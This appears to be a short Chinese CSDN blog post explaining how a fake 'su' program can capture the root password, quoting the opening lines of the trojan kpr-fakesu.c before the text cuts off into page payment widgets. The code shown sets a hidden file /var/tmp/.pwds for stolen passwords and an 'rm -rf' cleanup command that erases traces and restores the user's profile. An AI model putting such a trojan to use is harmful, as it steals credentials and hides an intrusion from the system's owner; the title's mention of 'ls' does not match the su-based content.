linux劫持ls命令记录root密码

本文介绍了如何通过劫持ls命令来记录root密码。当root用户执行ls时,密码会被写入指定文件。这种方法利用了命令劫持的思路,模拟正常登录过程并记录敏感信息。虽然例子简单,但提示了在安全防护上要注意避免此类陷阱。
摘要由CSDN通过智能技术生成

今天学习的时候看到了一个通过劫持su命令获取root密码的例子,我稍稍做一下解释,代码如下:

/* 
* kpr-fakesu.c V0.9beta167 ;P
* by koper <koper@linuxmail.org>
*
* /bin/su sends various failure information depending on the OS ver.
* Please modify the source to make it "fit" ;)
* 
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[]){

FILE *fp;
char *user;
char *pass;
char filex[100];
char clean[100];

sprintf(filex,"/var/tmp/.pwds"); //保存命令 存储密码的文件位置
sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/whyx/.wgetrc /home/whyx/.bash_profile");
// 修改 /home/XXX 为用户的目录  还原用户环境变量文件
if(argc==1) user="root";   
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值